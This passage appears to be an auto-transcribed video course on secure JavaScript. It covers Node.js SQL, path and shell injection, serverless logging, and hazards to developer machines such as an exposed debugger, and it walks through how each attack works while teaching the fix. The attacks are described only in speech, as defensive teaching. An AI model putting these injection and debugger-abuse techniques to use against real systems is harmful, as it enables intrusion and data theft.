tells the SQL driver to not consider anything that's replacing this question mark as executable code, but only as literals. And now, if I rerun the same thing with the attack is just ignored and we just get the element with the ID 1. There are another very interesting kind of SQL injections, and you can check the SQL injection course on InfoSec if you're interested in that. It's called blind SQL injections. So here we've got another endpoint that actually doesn't return really data. It returns number. What's interesting is that actually it's injectable and you can make it lie. So if I write 2 or 1 equals 2 or 1, it will return something. But if I return 1 or 2 or 1 equals 1, it returns something else, because it becomes a tautology. Because this tells me, return me the item with ID 2 or 1 equals 1, which means all items. If I put an AND here, it will only return this, and if I put something that's false, it will never return anything. And actually, it even crashed. It even 404. Yes, it's 404 because I've got this. It's interesting because using timing attacks, a hacker can actually tamper that. So when we placed our or 1 equals 1, the query will become something like that, for instance. But by doing timing attack, the user could do things or author.email like, and then put a regular expression. And byte by byte, they would be able to detect, because this will return true or false, 20,044, would be able to detect the whole content of the database. That's very advanced attacks that are done through automated scripts, but they are brilliant. Once again, the solution is actually to remove this and make the parameter escaped and be protected against SQL injection. Second kind of injections I wanted to show today was path injections. So it's actually very common for a web server to have access to things on the file system. For instance, when you serve a static website, from your backend website, when you have both in a single process, well, it's very common for your server to have access to the file system and to be able to serve files from the file system. This, once again, is injectable. Let me show you how. What we want to do is we want to access into the directory file and print secret.txt. Usually, to prove that, one will go to //etc/password, but since this is a recorded video on my personal laptop, that's not gonna happen. So the standard, the naive way of doing that would be to do /files/secret.txt. And that will actually fail because the browser and the server don't want to interpret this as a real path because of the slash. They won't interpret this as a parameter. So when you don't know how to inject something in a server, usually the ideal way is to HTML escape, to escape URI components encode it. That's what it has been done for, actually. So we do this, and this returns us an encoded string. And if we place it here, we get the content of the secret file. Why is that? Well, let me add a debug point here and restart the server. When I run the legitimate query, the path to be read is actually this. And you get pages index.js. However, when I run the injected thing, the path becomes a full path like that with /file secret.txt. So what you want to do to be safe is actually, first of all, use the path package in Node.js. It's a standard package. So never concatenate path yourself. And let's find out if that's enough to protect us. Path.join. This method is not enough because it actually creates the path. So once you have done that, here at this point, you have the full path that is still malicious, but at least it's normalized. So now what you want to do is to have const public path equals path.join, and we just take those two first arguments. I don't know why I have a hands rather than a... And what you want to do is to check that path.base name of file path, and you compare that with public path, and that's just a matter of an if statement here. Up here we can see that the path, where you get that? The path is /page, and here it's secret.txt because I did not use the right method. It was dir name to use. Sorry about that. And here you can see that they are different. And you can put a check in the code to make sure that if path.dirname is not the public path, then res and no attacks here. And of course a little return statement. Let's see that again. No attacks here. And that's because we limited the actual path access for the file, for the syscall. Okay, last one I will show, and you understand why I did not spend that much time on Mongo injection. That's because we already spent a lot of time here. It's actually sometimes convenient to use shell commands when you want to run a sub-process, like a Python command, or check the size of a file on the disk. Well, when you do that, you must always use the spawn command and pass the command as the first argument and the parameters of the command after. That will do exactly the same thing as the SQL escaping. If you use any other ones as spawn, like exec, something like that, well, the attacker actually will have access to run, he will be able to run any arbitrary script on the server, meaning they will be able to write things, to overwrite things, but also to access the database, to steal the environment variables, pretty much everything. They will be even able, thanks to a method I developed recently, I invite you to Google my blog on that, they will even be able to circle back within the Node.js process and obtain a Node.js process remote code injection through that. So once again, there are methods that are already escaped in the runtime for you to use. Just use them. I don't know why I have frozen now. Let me just ask QuickTeam to add me back on the screen. Thanks so much for watching this video. I hope it helped you. It was mostly an introductions to injections in Node.js that can happen in a serverless environment too. Thanks so much for watching that. I hope you enjoyed the video. Have a great day. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkam. In this video we will talk about serverless logging and monitoring. So here we've got our function that we created a couple videos ago, and actually it returns the Levenstein distance between two words that you can pass as parameters here. This function is deployed on Google Cloud Service Functions project, and if we check the logs, well, bad, but we saw, if you remember the first video, that when we had an error, we were not able to know why there was an error, and we had to imagine it. Well, that's because we made a first mistake, is that we forgot to add logs. The question that everyone asks is, should you log the input parameters of a lambda, of a function? Well, you should not, because there are a lot of things that you don't want to log in the input object. That can include cookies, that can include other shared secrets, JSON web tokens, or even IP addresses of your end user. And you don't want to have that in logs because you want to separate who has access to which piece of information. One thing that you can do is to log what's important for the functioning of the function. So in this example, I will do console.log args, and I will just log the two words. Also, we know that logging is critical when things don't go well. So another thing we need to log is console.log, and we need to log the most of thing we can, because we need to understand why it failed. So we can do something like this. Let's actually put that at a new line. And what to. That way, if we don't want to disclose the arguments directly, well, we would be able to at least disclose their value. Also, by checking the code, there is another reason why it could fail, and it's query keys. Actually, the user might be pushing the wrong query keys to the function. That's actually important to evaluate all the reasons that could bring you to this error code path, because you want to make sure that it will give you enough pieces of information for when things will go wrong. Let's say I would have just logged, I wouldn't have logged this because that would be confidential data, and I would only log the type of word 1 and word 2. Well, if a user has written word 1, 2 instead of 1, well, I wouldn't be able to tell them they did that. I won't be able to fix why they failed, and probably I would not be able to learn from this mistake. So let's just wait for this to redeploy. And here we can see that we have the words being logged now. Let's retry. Let's refresh. I apologize in advance if Google changes the language of my interface. I don't know why, but for some reason today it wants me to see Google in French. So here we have run an error case. Function execution started, and it's still catching up with the logs. So as you can see, we have the arguments being logged. That's not always the best practices, needs to be understood. But here we've got a 400 error. And actually, Google is having a bad time. Here it is. And here we've got our logs. We know that word 1 was a string, but word 2 was not, and that we only had a query key for word 2. As you can see, Google is not deterministic in the order where it gives you the log. The other thing you want to monitor when you have a Lambda function is the number of invocations. Actually, the number of invocation has a direct impact on your billing because you pay by billing and by invocation and time. So you want to keep an eye on that. And for this part, the cloud provider usually have pretty good ways of telling you this. However, the interesting part is that they don't tell you about the details of the execution time. They just tell you your lambda is being slow, your lambda is being quick. And as you have seen, the logs are not that helpful when you would have a lot of concurrencing. So either you are able to understand why your lambda is your function is slow by correlating the logs with a peak of invocation time, but you also need to know that there is what's called the cold start time, meaning booting a new container with your function. Either what you want is an APM. So for instance, Datadog, or I'm pretty sure New Relic has it too. APMs such as Datadog, New Relic, Dynatrace, you name the one you like, have actually support for lambdas and serverless. They mostly have partnered with AWS so far because AWS provide what's called a layer that has actually been designed for monitoring of AWS Lambda. Otherwise, in Google Cloud, you will just have to run it as an APM. The APM will actually tell you on a transaction what is slow, and if it knows about your cloud infrastructure, for instance, if you deploy Datadog or AWS or New Relic on AWS Lambda, it will actually be able to tell you about what is really slow in your infrastructure, but also in your code. If you have a transaction that is slow because of a database call, it will give you a span tree, and actually tells you why you are being slow. Those are the three main important things to log in production. So compared to a usual application, there's not much. So you want to know about the logs to make sure that when things go bad, you can audit them. You want to know about the impact in terms of billing. Also, if you ask Google Cloud about the billing part, they will give you high-level views on the billing problematics and tell you, well, you have spent that much cost on lambdas or on other situations. That's actually pretty handy to use. I'm on a free plan, so they don't really tell us much about that, and I should be cautious when showing you this part because there is my credit card number somewhere in this dashboard. Also, you want to be able to log the performances of the application. So you know, for instance, that this call to this function is actually slower than all the rest of the code path, or that a database query takes much more time than it should to respond to your user. The attacks that can come out of that is that actually, well, time is money, and that's actually very true with function as a service, because the longer your function takes to execute, the more cost you will have. So instead of doing actual DOS by disabling your systems and preventing your systems from being accessible on the internet, well, the attacks by hammering serverless functions hits you when it's painful, your wallet, and you will just pay insane fees out of function calls. There's actually one good thing is that you can create budget, and you will get alerts when charges exceed an amount. And for all cloud provider systems, there is a way to limit your cost and say, hey, I'm not putting much more than that money on the table. Also, out of my experience, if that's the first time you have very high issues and costs because of poorly predicted costs or attacks or badly used services, cloud providers might, and I'm not engaging anyone and I'm not affiliated with any cloud provider when I say that, some cloud providers might actually forget about your billing for 1 month if you spend really too much money. But that's a one-to-one negotiation you must have with your account executive on the cloud provider side. Thanks so much for watching this video. I hope you enjoyed it. And I hope it's clear for you to protect serverless applications now. Have a great day. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkem. This is a bit of a special video because this one is not aimed at giving you hints on how to build safer applications, but give you hints at how to protect yourself, your identity, your desktop or laptop machine. As a web developer, you are under attack. You are under attack when you download dependencies from the network. Even if you are using Dino, the security flags won't protect you if you build a web application. Because, for instance, if you are building a web application, you probably need the allow.net flag and probably the allow file system flag because you have a building toolchain locally to build your app. Based on that, they can still do pretty much what they want on your system or on the network. You are under attack, and Dino won't save you. And it's not about Node being vulnerable to injections in modules, to attacks in modules. That's the same in Python, that's the same in Ruby, that's the same in Go, that's the same in Rust. All people who write code on their machines, debug it, build web applications, and use modules from the internet are under attack. I will share you a few hints on what to do when you're not sure where you're going. First thing, we talked about malicious dependencies. There is actually one good way that is pretty straightforward, and if you are used to do web programming, you should be used to doing that, is to use a Docker file. Just do a Docker file with from node 14 workdir /app, copy the dot. Of course, you don't want to do that. You want to read the page on how to do a Docker file with Node.js and nodejs.org. But if you get sources from a repo you don't trust, meaning that it's just a random repo from the internet, from GitHub, just actually run it first in a Docker and understand what happens. That's the first thing to do. Also, when you install it, run npm audit. Because npm audit knows about malicious modules and their versions. Same thing, feel free to install Snyk, SNYK, and do the same thing. They have a bigger database, and that's their job to find vulnerable and malicious modules. The next things to take care about is what happens when the web server is running on your machine. Well, right now the web server is running on my machine. How do I know that nobody has access to it from another machine on the network? Like if my cell phone is on the same Wi-Fi, does it have access to it? Probably doesn't mean much when you're at home, and in COVID era everyone is at home, but when you are in a public shared office, maybe when there are thousands of people on the same network, they can access your website on your localhost machine. Or maybe when you are in McDonald's and Starbucks and sharing a public Wi-Fi, or in an airport or a plane, well, they might have access to your public machine. There's only one way to prevent that, actually two. It's either to know on which interfaces the process is listening, and in that case you need to check the specification of the framework. For instance, by default, the framework for Node Fastify only listens on loopbacks interface, meaning that you can't access by default a server from another machine when it's running on Fastify. That's why when you are using Fastify in a Docker image, you actually want to tell it to listen on all interface. So you check the doc and you give it the interface to listen on. Listen and then the interface. Another thing you can and must do, depending on your system, is to know about your firewall configuration. Your firewall will limit who has access to which port on your machine. By default, on macOS, and I won't show you because they're personal information, you've got a firewall, but that won't prevent these kind of things on all ports. You can configure it or install an extra firewall. Samely, it's actually very dangerous to debug a process on your machine, whatever the technology you use. Here, I started the debugger, and of course, because I started it in my IDE, it doesn't like it. Give me one sec. Up, node, minus inspect, min w. Here I can see my local instance. However, it has discovery network target. And now someone could add all the IP addresses on the network and scan for the WebSocket, the debugging WebSocket of Node.js. Because that's how Chrome and Node.js do remote debugging, through a WebSocket and a specific protocol. When you have access to a process running Node.js remotely through the debugger, that's a good mode. You can actually require fs exec sync echo hello doc.txt. And I got an error because exec sync does not exist. That's so you look like a stupid hacker, because you actually were thinking about child process instead of fs, and the command fails. Okay, why not? Because I'm not in a shell. Okay, that's the demo effect. I want it to be scary. But you could use fs to write locally, or you can run any arbitrary process. As you can see, the logs are actually displayed here for the error I built. So when you build a web application locally, you need to be worried about few things. The dependencies you don't trust. If the project is just something you got on GitHub, don't run it on your machine directly. That can be vulnerable or malicious code. When you have your project running on your machine, there can be vulnerable code running on your machine. For instance, if you have seen the video about Node.js injection in this learning path, well, you would know that shell injection and SQL injections are a real thing. And you can obtain a shell injection from a SQL injection under certain conditions. Or you can access the file system under other conditions. There are a lot of tools used to serve file locally for development purpose that are vulnerable to directory traversal. That's why when you run your own machine, you want to make sure that the listening interface is only on localhost and that your firewall prevents remote connections. Worst again, when you are running the debugger, make sure that nobody can access it from the network. As a rule of thumb, don't develop on a public network. That's actually extremely dangerous. Don't npm install from a public network. When you are working in a company, there are usually a private and a public network. A private for employee and a public for guests. Don't develop connected to the guest networks. That's extremely dangerous. Nobody thinks about taking care of which Wi-Fi they are connected to when they develop, but that's actually a critical part. Also, make sure that in your package lock, every dependency is resolved through HTTPS. There used to be a vulnerability in Yarn where it allowed resolving dependencies over HTTP. It actually still works when you have a local Verdaccio server without SSL enabled. That's extremely dangerous because someone listening on the network could actually give you malformed packages. Hopefully the signature will protect you, but it's SHA-1, so sometimes it's not enough. Well, I hope you're not too terrified at the end of this video. I just wanted to show you a few things and a few ways to hack a web developer. It's the time for the disclaimer. I told you that when you are on the same network as someone malicious and you are developing web applications, the someone malicious can do a lot of harm. Don't be a terrible person. Don't try to attack your coworkers locally when they develop. That's just not fair, and that's actually a big hazard for your job. Thanks so much for watching this video. I hope you enjoyed it. Have a great day and take care of yourself.